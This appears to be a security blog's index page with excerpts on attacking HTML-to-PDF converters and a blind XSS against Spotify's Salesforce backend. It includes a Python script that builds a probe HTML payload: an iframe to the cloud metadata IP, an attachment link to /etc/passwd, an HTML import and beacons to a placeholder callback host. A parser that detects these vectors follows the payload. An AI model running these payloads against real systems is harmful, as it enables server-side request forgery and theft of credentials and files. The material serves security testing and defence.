Mohammed Diaa

Automate all the things

Exploiting HTML-to-PDF Converters through HTML Imports

You’ve probably already heard about many different ways to exploit HTML-to-PDF converters and access sensitive info: you can try to <iframe> AWS’s 169.254.169.254 IP and read that sweet, sweet metadata. Didn’t work? Inject a <script> tag and use JavaScript. Filtered, too? Maybe try a <link> with a rel="attachment" property and attach a sensitive file to the PDF. No? At least use an <img> to send GET requests to internal hosts or fingerprint them using their favicons?...
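The vectors listed above, as an added example that is not code from the original post: a probe document that exercises each of them once (the <iframe> to the metadata IP, an inline <script>, a <link rel="attachment"> to a local file, an <img> to an external host, plus a <link rel="import"> for the HTML-import vector in the post's title), and the triage check a reviewer would run over user-controlled HTML before handing it to a converter. CALLBACK_HOST is a placeholder for a listener you control; each vector points at a distinct path there so its access log shows which element the converter actually followed. The set of risky link rel values is an assumption for this example, not taken from the post.

```python
"""Probe document and triage check for HTML-to-PDF fetch vectors.

Added example, not code from the original post. CALLBACK_HOST is a placeholder
for a listener you control; each vector uses a distinct path on it so the
listener's access log tells you which element the converter followed.
"""
import ipaddress
from html.parser import HTMLParser
from urllib.parse import urlsplit

CALLBACK_HOST = "probe.example.net"  # placeholder, replace with your own listener
METADATA_IP = "169.254.169.254"      # cloud instance-metadata address named in the post


def build_probe_html(callback_host: str = CALLBACK_HOST) -> str:
    """Return one HTML document exercising each vector the post lists, plus an
    HTML import (the vector in the post's title)."""
    return f"""<!doctype html>
<html><body>
<p>pdf probe</p>
<iframe src="http://{METADATA_IP}/latest/meta-data/"></iframe>
<script>
  // only runs if the converter executes JavaScript
  document.write('<img src="http://{callback_host}/js-executed">');
</script>
<link rel="attachment" href="file:///etc/passwd">
<link rel="import" href="http://{callback_host}/html-import">
<img src="http://{callback_host}/img-fetch">
</body></html>
"""


# Elements whose attribute makes a renderer fetch a URL or read a local file.
FETCH_ATTRS = {
    "iframe": "src", "frame": "src", "img": "src", "script": "src",
    "object": "data", "embed": "src", "link": "href",
}
# link rel values that cause a fetch or a file attachment in common renderers
# (assumed set for this example; extend it for the converter you are testing)
RISKY_LINK_RELS = {"attachment", "import", "stylesheet", "prefetch", "preload"}


class FetchVectorFinder(HTMLParser):
    """Collect (element, target) pairs for every element that would trigger a fetch."""

    def __init__(self) -> None:
        super().__init__()
        self.findings: list[tuple[str, str]] = []

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "script":
            # inline script is a vector even without src: it can write further tags
            self.findings.append(("script", a.get("src") or "(inline)"))
        elif tag == "link":
            rels = set(a.get("rel", "").lower().split())
            if rels & RISKY_LINK_RELS:
                self.findings.append((f"link rel={' '.join(sorted(rels))}", a.get("href", "")))
        elif tag in FETCH_ATTRS and a.get(FETCH_ATTRS[tag]):
            self.findings.append((tag, a[FETCH_ATTRS[tag]]))


def find_fetch_vectors(html: str) -> list[tuple[str, str]]:
    """Parse untrusted HTML and list every element that would make the converter fetch something."""
    finder = FetchVectorFinder()
    finder.feed(html)
    finder.close()
    return finder.findings


def targets_internal(url: str) -> bool:
    """True when a target is a local file or a loopback/private/link-local address,
    which is what the metadata-IP and internal-host probes rely on."""
    parts = urlsplit(url)
    if parts.scheme.lower() == "file":
        return True
    host = parts.hostname or ""
    if host == "localhost":
        return True
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return False  # a DNS name: resolve it before deciding (not done here)
    return ip.is_loopback or ip.is_private or ip.is_link_local


if __name__ == "__main__":
    for element, target in find_fetch_vectors(build_probe_html()):
        flag = "INTERNAL" if targets_internal(target) else "external"
        print(f"{flag:8} {element:22} {target}")
```

Feed the output of build_probe_html() to the converter under test and read the listener's log: a hit on /img-fetch means plain image loads go out, a hit on /js-executed means JavaScript runs, a hit on /html-import means HTML imports are followed, and an attached /etc/passwd in the resulting PDF means the attachment vector works. On the defensive side, any finding from find_fetch_vectors() on user-supplied HTML should be stripped or blocked before rendering; targets_internal() only classifies literal addresses, so a hostname that resolves to an internal IP still needs a resolution check.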

October 10, 2021

Blind XSS in Spotify's Salesforce Integration

This is the story of a blind XSS vulnerability that affected Spotify. It could have allowed an attacker to gain access to their customer support backend, which is built on Salesforce. First, some background. What is a “blind XSS vulnerability”? Blind XSS is a type of persistent XSS in which the attacker cannot see where or when their payload has fired. It happens when a user’s unsanitized input is displayed on a page that is only accessible to users with specific privileges, such as feedback, contact, and logging dashboards....

July 19, 2016